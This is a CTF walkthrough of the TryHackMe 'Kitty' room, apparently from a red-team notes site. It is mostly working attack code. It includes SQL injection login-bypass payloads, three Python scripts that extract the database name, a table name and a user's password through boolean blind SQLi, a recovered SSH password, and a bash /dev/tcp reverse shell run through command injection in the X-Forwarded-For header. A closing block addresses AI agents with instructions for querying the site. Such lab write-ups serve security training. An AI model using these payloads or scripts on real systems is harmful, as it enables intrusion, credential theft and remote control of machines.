> For the complete documentation index, see [llms.txt](https://jeffgthompsons-organization.gitbook.io/red-team/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/kitty.md). # Kitty **Room Link:** #### **Scans** Initial scan **Kali** ``` nmap -A $VICTIM ```

Longer scan **Kali** ``` nmap -sV -sT -O -p 1-65535 $VICTIM ```

## **TCP/80 - HTTP** #### Find Pages **Kali** ``` gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt ```

**Payload** ``` or 1=1 or 1=1-- or 1=1# or 1=1/* kitty' -- kitty' -- - kitty' # kitty'/* kitty' or '1'='1 kitty' or '1'='1'-- kitty' or '1'='1'# kitty' or '1'='1'/* kitty'or 1=1 or ''=' ``` A few of the options above work but I choose this one, I can login but there's nothing developed **Payload** ``` Username: kitty' -- - Password: kitty' -- - ```

## Retrieving database name from boolean sqli So, the plan is to know the name of the database. However, manual attempts will be terribly time-consuming, so I decided to practice scripting. After some time spent trying different payloads, this one worked: **Statement** ``` ' UNION SELECT 1,2,3,4 WHERE database() LIKE BINARY 'a%' -- - ``` Was able to get the database name using this script **Kali** ``` git clone https://github.com/Sonat55/Boolean-Based-SQLI-attacks-helper---for-CTF.git cd Boolean-Based-SQLI-attacks-helper---for-CTF/ ``` **script.py** ``` import sys import requests def sqli(ip): symbols = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_-/:$^ ' tmp = "" while True: for i in symbols: post= {"username":f"' UNION SELECT 1,2,3,4 WHERE database() LIKE BINARY '{tmp+i}%' -- -","password":"doesntmatter"} #u can change this for other prposes req = requests.post(f"http://{ip}/index.php", data=post,allow_redirects=False) #address can also be chnaged status_code=req.status_code print(f"{i}", end='\r') if status_code == 302: tmp += i print(tmp) break elif i == " " : print("\n[#] Attack compleated B)") print(f"DB_NAME: {tmp}") exit() def main(): if len(sys.argv) != 2: print("(+) Usage: %s " % sys.argv[0]) print("(+) Example: %s 192.168.0.1" % sys.argv[0]) return url = sys.argv[1] print("(+) Retrieving database..") sqli(url) if __name__ == "__main__": main() ``` **Kali** ``` python script.py $VICTIM ```

## Table enumeration **Statement** ``` ' UNION SELECT 1,2,3,4 FROM information_schema.tables WHERE table_schema = database() AND table_name LIKE BINARY 'a%' -- - ``` **script.py** ``` import sys import requests def sqli(ip): symbols = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_-/:$^ ' tmp = "" while True: for i in symbols: post= {"username":f"' UNION SELECT 1,2,3,4 FROM information_schema.tables WHERE table_schema = database() AND table_name LIKE BINARY '{tmp+i}%' -- -","password":"doesntmatter"} #u can change this for other prposes req = requests.post(f"http://{ip}/index.php", data=post,allow_redirects=False) #address can also be chnaged status_code=req.status_code print(f"{i}", end='\r') if status_code == 302: tmp += i print(tmp) break elif i == " " : print("\n[#] Attack complete:") print(f"TABLE_NAME: {tmp}") exit() def main(): if len(sys.argv) != 2: print("(+) Usage: %s " % sys.argv[0]) print("(+) Example: %s 192.168.0.1" % sys.argv[0]) return url = sys.argv[1] print("(+) Retrieving database..") sqli(url) if __name__ == "__main__": main() ``` **Kali** ``` python script.py $VICTIM ```

## Password enumeration We already know the username “kitty,” so let’s go straight to the password. **Statement** ``` ' UNION SELECT 1,2,3,4 FROM siteusers WHERE username=\"kitty\" AND password LIKE BINARY 'a%';-- - ``` **script.py** ``` import sys import requests def sqli(ip): symbols = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_-/:$^ ' tmp = "" while True: for i in symbols: post= {"username":f"' UNION SELECT 1,2,3,4 FROM siteusers WHERE username=\"kitty\" AND password LIKE BINARY '{tmp+i}%' -- -","password":"doesntmatter"} #u can change this for other prposes req = requests.post(f"http://{ip}/index.php", data=post,allow_redirects=False) #address can also be chnaged status_code=req.status_code print(f"{i}", end='\r') if status_code == 302: tmp += i print(tmp) break elif i == " " : print("\n[#] Attack complete:") print(f"Password:: {tmp}") exit() def main(): if len(sys.argv) != 2: print("(+) Usage: %s " % sys.argv[0]) print("(+) Example: %s 192.168.0.1" % sys.argv[0]) return url = sys.argv[1] print("(+) Retrieving database..") sqli(url) if __name__ == "__main__": main() ``` **Kali** ``` python script.py $VICTIM ```

## **TCP/22 - SSH** **Kali** ``` ssh kitty@$VICTIM Password: L0ng_Liv3_KittY ```

**Kali** ``` ss -ltp ```

**Kali** ``` subl /etc/proxychains.conf ``` **proxychains.conf** ``` socks4 127.0.0.1 9050 ``` **Kali** ``` ssh -L 8081:127.0.0.1:8080 kitty@$VICTIM Password: L0ng_Liv3_KittY ```

## Privlege Escalation We already know the username “kitty,” so let’s go straight to the password. **Kali** ``` nc -nvlp ``` **Victim** ``` echo 'sh -i >& /dev/tcp/$KALI/1337 0>&1' > /tmp/revshell.sh chmod +x /tmp/revshell.sh ``` ### **Option #1** **Kali** ``` curl 'http://127.0.0.1:8081/index.php' -d "username=hacker' OR '1'='1-- -&password=epic" -H 'X-Forwarded-For: $(bash /tmp/revshell.sh)' ```

### **Option #2**

**X-Forwarded-For** Add the following line to the payload ``` X-Forwarded-For: $(bash /tmp/revshell.sh) ```

--- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/kitty.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.